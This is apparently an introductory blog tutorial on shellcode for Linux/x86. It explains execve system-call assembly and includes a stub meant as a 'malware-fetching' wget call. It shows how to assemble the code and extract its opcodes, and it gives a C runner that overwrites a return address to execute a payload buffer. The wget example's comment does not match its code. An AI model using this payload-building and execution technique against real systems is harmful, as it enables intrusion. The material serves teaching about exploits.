Exploit Payload Basics

A good place to start is defining what ‘shellcode’ is. According to Wikipedia: ‘shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.’

I suppose a classic example of this would be a buffer overflow: the shellcode is written into memory along with the oversized input, and the overflow overwrites a return address (or some other control value) so that execution jumps to it. For this to happen, there must be a vulnerability, and an exploit must be created to set things up for the shellcode to execute.


Disassembling a random Sysinternals binary (as an example) gives us a load of assembly code.

  • Assembly code is built mostly from a handful of common instructions (add, sub, mov, etc.), each of which is assembled into an opcode that the microprocessor decodes and executes on whatever operands are passed to it.
  • Each register (EAX, ECX or whatever) is a small, fast storage location inside the processor itself, not a wire to a memory chip, I/O port or pretty flashing LEDs. Instructions move values between registers, memory and I/O ports, so what a register holds when an instruction or system call executes determines what that operation does.
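To make the instruction-to-opcode mapping a bit more concrete, here is a minimal Python sketch that hand-encodes two simple x86 instruction forms. The function names are made up for illustration, and only the `mov r32, imm32` (0xB8 plus register number) and `push r32` (0x50 plus register number) encodings are covered; a real assembler handles far more.

```python
import struct

# Register numbers used inside 32-bit x86 instruction encodings.
REG32 = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3,
         "esp": 4, "ebp": 5, "esi": 6, "edi": 7}

def encode_mov_imm32(reg, value):
    """Encode `mov reg, imm32`: one opcode byte, then the value as 4 little-endian bytes."""
    return bytes([0xB8 + REG32[reg]]) + struct.pack("<I", value & 0xFFFFFFFF)

def encode_push(reg):
    """Encode `push reg` as a single byte."""
    return bytes([0x50 + REG32[reg]])

print(encode_mov_imm32("eax", 11).hex(" "))  # b8 0b 00 00 00
print(encode_push("edx").hex())              # 52
```

The point is only that each mnemonic is a human-readable name for a short byte sequence, and those bytes are what a disassembler turns back into text.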

Shellcoding for the Linux/x86 Architecture

This principle is best illustrated with shellcode created for a Linux system, as there is a definite set of system calls mapped to specific numbers in /usr/src/linux/include/asm-i386/unistd.h (for the i386 architecture), and a specific register that number is stored in at runtime (in this case EAX). Meanwhile, the arguments/parameters for a system call are stored in registers EBX, ECX, EDX, ESI, EDI and EBP, in that order. I haven’t the slightest idea what the equivalent is for a Windows operating system.
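As a rough illustration of that number-to-call mapping, the sketch below parses `#define __NR_...` lines into a lookup table. The embedded excerpt is a hand-typed sample of a few well-known i386 entries rather than a copy of any particular kernel's header, and `parse_syscall_numbers` is a hypothetical helper name.

```python
import re

# Hand-typed sample in the style of asm-i386/unistd.h (not a full header).
SAMPLE_HEADER = """\
#define __NR_exit    1
#define __NR_fork    2
#define __NR_read    3
#define __NR_write   4
#define __NR_open    5
#define __NR_close   6
#define __NR_execve 11
"""

def parse_syscall_numbers(header_text):
    """Return {syscall_name: number} for every simple `#define __NR_name N` line."""
    pattern = re.compile(r"^#define\s+__NR_(\w+)\s+(\d+)\s*$", re.MULTILINE)
    return {name: int(number) for name, number in pattern.findall(header_text)}

table = parse_syscall_numbers(SAMPLE_HEADER)
print(table["execve"])  # 11
```

Feeding it the contents of the header on your own machine should give the full table for that kernel, assuming the header uses plain numeric defines like the sample.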

With this in mind, it’s now much easier to understand a segment of code I robbed from the InfoSec Institute’s site:

    mov eax, 11
    mov edx, 0
    mov ebx, cmd
    push edx
    mov ecx, file
    push ecx
    push ebx
    mov ecx, esp
    int 80h

It places the value 11 in register EAX, which on i386 selects the *execve()* system call in asm-i386/unistd.h. Next, the code puts the address of ‘cmd’ in EBX as the first argument (the program to run) and zeroes EDX, the third argument (the environment pointer). The ‘push’ instructions don’t execute anything themselves: they build a null-terminated argument array on the stack (‘cmd’, ‘file’, 0), and ‘mov ecx, esp’ passes the address of that array as the second argument. Finally, ‘int 80h’ raises a software interrupt that switches from user space to the kernel, which reads EAX and runs the requested call.
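The effect of the three push instructions can be sketched with a toy stack model. This is only a simulation under simplifying assumptions: the strings 'cmd' and 'file' stand in for the numeric addresses real code would push, and `simulate_pushes` is a made-up helper.

```python
def simulate_pushes(values):
    """Model a downward-growing stack: return its contents read upward from ESP."""
    stack = []
    for value in values:
        # Each push lands at a lower address, so it becomes the new first element.
        stack.insert(0, value)
    return stack

# push edx (0), push ecx (address of file), push ebx (address of cmd)
from_esp = simulate_pushes([0, "file", "cmd"])
print(from_esp)  # ['cmd', 'file', 0]
```

Read upward from ESP, the stack holds the program name, its argument and a terminating zero, which is the layout of a null-terminated argument array.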

Our shellcode does nothing on its own, as it’s not a binary/executable. The latter must be in a specific format (ELF) in order for a Linux system to execute it, with a data section and a text section. And just to make things more complicated, the labels in our code refer to strings defined in the data section, as my own little malware-fetching example shows:

    ;/bin/cat /etc/getmalware
    section .data
    get db '/bin/wget', 0
    file db '', 0           ; empty, null-terminated argument string
    section .text
    global _start
    _start:
    mov eax, 11             ; execve on i386
    mov edx, 0              ; no environment
    mov ebx, get            ; path of the program to run
    push edx                ; argument array terminator
    mov ecx, file
    push ecx
    push ebx
    mov ecx, esp            ; pointer to the argument array
    int 80h
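The ELF requirement mentioned above is easy to check by hand, since every ELF file starts with the four bytes 0x7F 'E' 'L' 'F', followed by a class byte (1 for 32-bit, 2 for 64-bit). The sketch below is a minimal check along those lines; `describe_elf` is a hypothetical helper, and it looks at nothing beyond those first five bytes.

```python
def describe_elf(data):
    """Return '32-bit' or '64-bit' for ELF data, or None if the magic bytes are missing."""
    if len(data) < 5 or data[:4] != b"\x7fELF":
        return None
    return {1: "32-bit", 2: "64-bit"}.get(data[4], "unknown class")

# Constructed headers for illustration; a real check would read the first bytes of a file.
print(describe_elf(b"\x7fELF\x01" + bytes(11)))  # 32-bit
print(describe_elf(b"mov eax, 11"))              # None
```

Raw assembled opcodes fail this check, which is one way of seeing why they need a container before the operating system will run them.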

Payload Execution

Another problem is we can’t get the shellcode to execute unless it’s already in memory with the processor’s instruction pointer pointing at it (which is what a successful buffer overflow arranges). What’s needed is a C program that holds the opcodes in a buffer and executes them. I’ve used the Netwide Assembler (NASM), which can generate object code in several formats, including Win32 and ELF (the one used here), then used *objdump* (part of the GNU binutils package) to get the opcodes.

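To assemble the code:

    $ nasm -f elf Malware-Fetch.asm

To dump the object code:

    $ objdump -d Malware-Fetch.o

This gives us some opcodes in the second column of the output, which are reformatted and put into a little C container that should look something like:

    char shellcode[] = "...";       /* opcode bytes from the objdump output go here */

    int main()
    {
        int *ret;
        ret = (int *)&ret + 2;      /* assumed to be main's saved return address (classic 32-bit stack layout) */
        (*ret) = (int)shellcode;    /* overwrite it so that main 'returns' into the buffer */
    }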
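The reformatting step can be sketched as follows. The sample text is a hand-written imitation of two lines of `objdump -d` output (tab-separated address, hex bytes and mnemonic), not the real output for Malware-Fetch.o, and both function names are made up for illustration.

```python
# Hand-written imitation of objdump -d lines: address, hex bytes, mnemonic.
SAMPLE = (
    "   0:\tb8 0b 00 00 00       \tmov    $0xb,%eax\n"
    "   5:\tcd 80                \tint    $0x80\n"
)

def opcodes_from_objdump(text):
    """Collect the hex-byte column from every disassembly line."""
    out = bytearray()
    for line in text.splitlines():
        fields = line.split("\t")
        # Disassembly lines look like '<address>:<TAB><hex bytes><TAB><mnemonic>'.
        if len(fields) < 2 or not fields[0].strip().endswith(":"):
            continue
        out += bytes.fromhex(fields[1])
    return bytes(out)

def to_c_string(data):
    """Format bytes as the body of a C string literal, e.g. \\xcd\\x80."""
    return "".join(f"\\x{b:02x}" for b in data)

print(to_c_string(opcodes_from_objdump(SAMPLE)))  # \xb8\x0b\x00\x00\x00\xcd\x80
```

Lines that don't follow the address/bytes/mnemonic pattern, such as section headers, are skipped, so in principle the whole dump can be passed in at once.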